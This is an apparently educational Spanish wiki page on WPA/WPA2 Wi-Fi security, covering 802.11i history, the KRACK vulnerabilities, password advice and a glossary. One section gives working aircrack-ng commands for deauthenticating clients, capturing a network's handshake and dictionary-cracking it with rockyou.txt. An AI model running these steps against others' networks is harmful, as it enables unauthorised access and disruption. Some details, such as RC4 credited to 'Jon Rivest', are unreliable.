Trabajo:Seguridad WPA

De FdIwiki ELP
Saltar a: navegación, buscar

Cifrado WPA2

WPA2 está basada en el nuevo estándar 802.11i. WPA, por ser una versión previa, que se podría considerar de "migración", no incluye todas las características del IEEE 802.11i, mientras que WPA2 se puede inferir que es la versión certificada del estándar 802.11i.

El estándar 802.11i fue ratificado en junio de 2004.

La Wi-Fi Alliance llama a la versión de clave pre-compartida WPA-Personal y WPA2-Personal y a la versión con autenticación 802.1x/EAP como WPA-Enterprise y WPA2-Enterprise.

Los fabricantes comenzaron a producir la nueva generación de puntos de accesos apoyados en el protocolo WPA2 que utiliza el algoritmo de cifrado AES (Advanced Encryption Standard). Con este algoritmo será posible cumplir con los requerimientos de seguridad del gobierno de USA - FIPS140-2. "WPA2 está idealmente pensado para empresas tanto del sector privado cómo del público. Los productos que son certificados para WPA2 le dan a los gestores de TI la seguridad que la tecnología cumple con estándares de interoperatividad" declaró Frank Hazlik Managing Director de la Wi-Fi Alliance. Si bien parte de las organizaciones estaban aguardando esta nueva generación de productos basados en AES es importante resaltar que los productos certificados para WPA siguen siendo seguros de acuerdo a lo establecido en el estándar 802.11i.

Diferencias entre WEP, WPA y WPA2

  • WEP: Utiliza cifrado de flujo RC4 y claves de 64/128 bits. Una clave estática debe ser introducida manualmente en cada dispositivo.
  • WPA: Mantiene el uso de RC4, pero añade IV (vectores de inicialización) más largos, junto con claves de 256 bits. Cada cliente consigue claves nuevas con TKIP y la inclusión del Modo enterprise: autentificación más fuerte mediante el uso de 802.1x y EAP más fuerte mediante el uso de 802.1x y EAP.
  • WPA2: Sustituye RC4 y TKIP con CCMP y el algoritmo AES, consiguiendo una autentificación y cifrado más fuertes.


Problemas de seguridad

El investigador belga Mathy Vanhoef ha descubierto gravísimas vulnerabilidades en la seguridad de las redes Wi-Fi presente en todos los routers del mundo. Así, se confirma que todas las redes inalámbricas con protección WPA2 son inseguras a un ataque.

WPA2 (Wi-Fi Protected Access II) es el reemplazo de WPA y a su vez de WEP, sistemas de seguridad que se rompieron hace más de una década. Es el sistema de seguridad que hace que sin la contraseña de la red Wi-Fi, no se pueda acceder a ella. Por suerte cuando WPA se rompió ya se estaba preparando WPA2, pero en esta ocasión no hay reemplazo.

Se le ha dado el nombre de KRACK (Key Reinstallation Attacks). KRACK es la combinación de hasta diez vulnerabilidades. De una u otra forma permitiría espiar las comunicaciones de una red Wi-Fi protegida. Ya sea en tu hogar o en tu empresa e independientemente del equipo que se use, los investigadores han logrado verificar las vulnerabilidades. Enlace al artículo sobre KRACK en la wiki.

CONSECUENCIAS:

La seguridad del router se ha roto. Esto no quiere decir que vayan a espiar las conversaciones o los datos que se transmiten. Se requiere estar cerca de la red y conocer estas vulnerabilidades, algo poco probable. Ni cambiar la contraseña del router o comprar uno nuevo arreglará nada. Este es un problema en la base de sistema de seguridad de todas las redes Wi-Fi del mundo.

Cómo ataca un ladrón

El objetivo para conseguir una contraseña WPA o WPA2 es capturar el handshake que se produce cuando un usuario se conecta a la red wifi.

1.) Miramos la interfaz que tiene nuestra tarjeta de red para ponerla en modo monitor

  1. ifconfig

2.) Ponemos la tarjeta de red en modo monitor para poder capturar todos los paquetes wifi que circulan por el aire

  1. airmon-ng start wlan0

3.) Seleccionamos la red wifi que queremos auditar y capturamos solo los paquetes dirigidos a esa red

  1. airodump-ng -c <CANALAP> --bssid <BSSID> -w fichero_captura_paquetes wlan0mon

4.) Necesitamos esperar a que haya clientes conectados a esa red para poder capturarles el handshake. Cuando eso ocurra vamos a lanzar paquetes de desautenticación para echarles de la red y poder capturarles el handshake justo cuando se conecten.

  1. aireplay-ng -0 15 -a <BSSID> wlan0mon

5.) Una vez capturado el handshake procedemos a crackearlo por fuerza bruta con un diccionario bastante común ‘rockyou.txt’.

  1. aircrack-ng fichero_captura_paquetes-01.cap -w /usr/share/wordlists/rockyou.txt

Cómo mantenerte seguro ante estos ataques

Los principales fallos de seguridad de este cifrado son las propias personas, aqui unos consejos a seguir para escoger contraseña:

· No dejes nunca la contraseña por defecto. · Intenta utilizar mayúsculas, minúsculas, números y caracteres especiales. · No utilices como contraseña palabras o frases conocidas o cercanas a ti. · No apuntes en un post it la contraseña y la pegues al router. · No dejes el nombre del router por defecto o sabrán fácilmente el tipo de router.

Si pones frases o palabras conocidas conseguirán facilmente tu contraseña con diccionarios tipo rock you.

Glosario de términos

  • RC4: desarrollado en 1987 por Jon Rivest. Ha sido utilizado ampliamente años atrás, sobre todo tras ser adoptado de forma oficial como método de seguridad del estandar Wireless LAN 802.11b. Utiliza un IV de 24 bits, junto con claves que oscilan entre 40 y 128 bits. Sin embargo, rápidamente se hizo patente que dicha estructura contenía vulnerabilidades y la generación de RC4 no era segura.
  • 802.11: se trata de una familia de especificaciones para Redes no cableadas de Area Local (WLANs). Desarrollada por un grupo de trabajo en el IEEE o Institute of Electrical and Electronics Engineers. Ha evolucionado desde su nacimiento y se han ido mejorando sus características. Está basado en el Protocolo Ethernet y CSMA/CA o Carrier Sense Múltiple Access con Collission Avoidance, lo que garantiza que la información se distribuye sin limitaciones ni pérdidas de paquetes en ambos sentidos. Guía de referencia sobre protocolo IEEE 802 Wireless.
  • AES: Se trata del algoritmo de encriptado de Rijndael escogido por el NIST en 2000 como sustituto del sistema DES. Sus siglas se traducen en Advanced Encryption Standard. AES trabaja con claves de 128, 192 o 256 bits de longitud. Comparando AES con DES, el NIST afirmó en su momento: Asumiendo que alguien pueda tomar el control de una máquina que pueda recuperar una clave DES en un segundo, esto requeriría en torno a 149 miles de billones de años para crackear una clave AES de 128 bits. Más tiempo del que nuestro propio universo ha existido hasta ahora.



Enlaces externos